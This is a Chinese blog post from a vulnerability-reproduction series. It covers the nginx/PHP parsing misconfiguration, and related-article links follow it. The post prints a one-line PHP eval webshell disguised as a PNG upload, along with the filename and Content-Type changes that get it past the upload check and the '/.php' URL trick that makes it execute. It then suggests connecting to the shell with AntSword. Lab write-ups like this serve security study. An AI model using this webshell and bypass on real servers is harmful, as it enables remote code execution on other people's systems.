nginx解析漏洞

最新推荐文章于 2024-04-13 01:02:19 发布

原创最新推荐文章于 2024-04-13 01:02:19 发布 · 188 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#nginx #网络安全

漏洞复现专栏收录该内容

18 篇文章

订阅专栏

nginx_解析漏洞

说明	内容
漏洞编号
漏洞名称	nginx 解析漏洞
漏洞评级	高危
影响范围	该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞
漏洞描述	可以通过绕过上传图片马
修复方案	升级

漏洞描述

由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),其中test.png是我们上传的包含PHP代码的照片文件。

漏洞等级

高危

影响版本

该漏洞与nginx、php版本无关,属于用户配置不当造成的解析漏洞

漏洞复现

基础环境

组件	版本
OS	kali-linux
Web Server	chrome
Source Code

漏洞扫描

漏洞验证

开启环境，访问主页
选择一句话木马+phpinfo上传，进行抓包
修改文件名
```
filename="1.php.png"
```
修改文件类型
```
Content-Type: image/png
```

修改文件内容

GIF89a
<?php @eval($_REQUEST[333]);phpinfo()?>

在这里插入图片描述

访问文件

http://192.168.117.163/uploadfiles/588c7f4a8707b25751914e6f95379049.png

在这里插入图片描述

修改url

http://192.168.117.163/uploadfiles/588c7f4a8707b25751914e6f95379049.png/.php

在这里插入图片描述

深度利用

GetShell

当漏洞验证成功时，证明一句话木马已经成功执行，可以直接上蚁剑进行连接

漏洞挖掘

网络测绘

nginx

修复建议

无

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

cwangc000

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

Nginx解析漏洞复现

钟言的博客

01-28

1万+

本篇为Nginx的解析漏洞复现，详细内容包含了搭建环境复现过程漏洞原理及防范同时包含了配置过程中出现的问题以及解决方案等等。

下列哪个是nginx解析漏洞会解析为php的文件_phpStudy nginx解析漏洞预警通报

weixin_39613951的博客

11-23

656

大网安协【2020-59】近日，大连网络安全信息通报机制合作单位新华三集团(H3C)提醒，一个PHP调试环境的程序集成包phpStudy，Windows 版本存在nginx解析漏洞。1.漏洞综述1.1漏洞背景phpStudy是一个PHP调试环境的程序集成包，兼容Windows和Linux系统，支持Web端管理，可以一键创建网站、FTP、数据库等，实现了文件管理，PHP多版本共存及切...

参与评论您还未登录，请先登录后发表或查看评论

CVE-2017-7529:Nginx敏感信息泄露

zhuchunyan_aijia的博客

01-22

1613

2017年7月11日，Nginx官方发布最新的安全公告，漏洞CVE编号为CVE-2017-7529，该在nginx范围过滤器中发现了一个安全问题，通过精心构造的恶意请求可能会导致整数溢出并且不正确处理范围，可能导致敏感信息泄漏，存在安全风险。具体详情如下: 漏洞编号: CVE-2017-7529 漏洞名称: Nginx敏感信息泄露漏洞官方评级: 中危漏洞描述: 当使用nginx标准模块时，这允许攻击者如果从缓存返回响应，则获取缓存文件头，黑客可以通过缓存文件头获取包含IP地址的后端服

技术分享|由于Nginx配置不当而导致内网资产暴漏

baidu_38876334的博客

03-30

956

当前有部分企业通常会在外网部署一些Nginx服务器，然后在Nginx中配置域名绑定。用户访问对应的域名，Nginx通过反向代理将对应的内网资源反馈给互联网上的用户，这样企业可以把服务器部署在自己的内网中，又可以让用户访问到一举两得。但是如果配置不当的话，一些不应该让用户访问到的资源，用户通过特殊的手段也可以访问到。运维人员无意中犯了一个错误，他把内网的管理系统和业务系统都用同一台nginx服务器进行反向代理，且这台服务器外网用户可以直接访问到。为了方便企业员工办公，运维人员同样给管理系统绑定了域名。

25、文件上传漏洞——Nginx文件解析漏洞

qq_55202378的博客

12-09

605

启动web服务，然后到web目录中写一个测试php文件，重启nginx服务，尝试访问，如果可以解析，则环境配置成功。，php解释器认为这不是php文件，于是返回"Access denied"。，转交给php解释器去处理。和Apache一样，Nginx也是通过。当作执行的文件，又因为文件后缀是。Nginx拿到文件路径。当php解释器遇到文件路径。不是解析为php文件吗？不存在，则会去掉最后的。是否存在，若存在，则把。若不存在，则继续去掉。/任意文件名.php。

被恶意上传了.php,轻松解决网站被恶意镜像

weixin_35676877的博客

03-16

472

老听说有人的网站被恶意镜像，于是我先收藏几种解决方法。镜像站看似一个完整的站点，其实每次用户访问镜像站点，他的小偷程序就会来正版的网站查询数据，并修改相关链接然后呈献给用户。实质上还是在读取原站的数据，我们只需要屏蔽到抓取我们数据的那个主机ip就可以了。方法一：.htaccess文件禁ip1、获取镜像服务器ip复制如下代码，新建一个php文件，并命名为“ip.php”上传到你的网站根目录$file...

常见安全漏洞及其解决方案

m0_61869253的博客

06-17

1759

执行时，此后的文本将被忽略。但这并不是无代价的，受到损失最大的就是被控制的网站，往往随着暗链所指向的网站的权重不断提高，存在暗链的网站的权重将不断下降，搜索引擎排名也必然一再下降，严重影响网站的影响力。漏洞危害：该漏洞是通过版本号探测的，可能存在误报Apache HTTP Server是一款开源的流行的HTTPD服务程序.当处理包含大量Ranges头的HTTP请求时，ByteRange过滤器存在一个错误，攻击者可以向服务器发送特制HTTP请求，消耗大量内存，造成应用程序崩溃CVE-2011-3192。

Nginx 解析漏洞复现及利用

Tauil的博客

07-20

8200

Nginx解析漏洞该解析漏洞是PHPCGI的漏洞，在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启，当URL中有不存在的文件，PHP就会向前递归解析在一个文件路径（/xx.jpg）后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件，很显然，不给上传，东西写进去文件被破坏了，被检验出不是正常的jpg不能上传了，可能有些朋友就成功了，因为第一次的时候我是可以的，现在应该是写的内容太多了，出了问题。phpeval($_POST["cmd"]);...

中间件漏洞（二）nginx解析漏洞

m0_63306943的博客

05-03

1090

会向上匹配，能匹配到nginx.png文件，又因为php-fpm.conf中的security.limit_extensions为空，也就是说任意后缀名都可以解析为PHP文件，所以就将nginx.png当作php文件进行了解析生成上面的结果。例：你的nginx下存在一个test.jpg文件，你在查找执行php文件时 /test.jpg/test.php查找时发现没有test.php就会向上匹配到test.jpg文件。这里我们利用到之前上传的一个包含php代码的文件nginx.png。

网络安全03---Nginx 解析漏洞复现

m0_68976043的博客

01-27

812

ubentu虚拟机，docker环境，vulhub-master环境包（资源已上传）

Nginx漏洞之未授权访问和源码泄漏漏洞处理

企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net

03-29

2733

Apereo CAS开箱即用，并且提供多种协议支持，如：CAS（v1，v2和v3）、SAML（1.0和2.0）、OAuth（v2）、OpenID、OpenID Connect等，Apereo CAS支持使用多种身份证方法，包括：JAAS、LDAP、RDBMS、Radius、JWT等。Keycloak是一个免费、开源身份认证和访问管理系统，支持高度可配置的单点登录（SSO）功能，旨在为现代的应用程序和服务，提供包含身份管理和访问管理功能的单点登录工具。完成后，配置要单点的应用程序。2>配置keycloak。

Nginx 解析漏洞复现

duoba_an的博客

02-24

782

环境搭建下载之后上传到虚拟机并解压进入这个路径就能看到有docker-compose.yml启动环境正常显示增加/.php后缀，被解析成PHP文件：：开启了cgi.fix_pathinfo选项后，本身是一个png文件，但是加上/.php后会把整个文件当中php文件来执行。

Nginx常见的三个漏洞

qq_57289939的博客

08-16

1462

uri。

Nginx+PHP 配置漏洞：静态文件都可以当作 PHP 解析

weixin_33851177的博客

08-17

407

这个漏洞严格上说并不是 Nginx 和 PHP 本身的漏洞造成的，而是由配置造成的。在我之前写的许多配置中，都普遍存在这个漏洞。简易检测方法：打开 Nginx + PHP 服务器上的任意一张图片，如： http://hily.me/test.png 如果在图片链接后加一串 /xxx.php （xxx为任意字符）后，如： http://hily.me/test.png/xxx.php 图...

DC-5靶机渗透

m0_62008601的博客

05-21

799

攻击机kali：192.168.56.102（桥接网络）靶机dc-5:192.168.56.106 （仅主机网络）两台主机的ip设置在同一网段之后开始扫描存活主机：扫描端口： nmap -sV -p- 192.168.56.106 80端口开放，用浏览器进行访问并没有发现什么信息 wappalyzer插件中可以看到web服务器为nginx，接着在页面摸索一番，发现contact下可以提交表单随便输入信息提交之后我们发现跳转到了另外一个页面且发现底部的年份发生了..

API安全产品，面试官都被搞懵了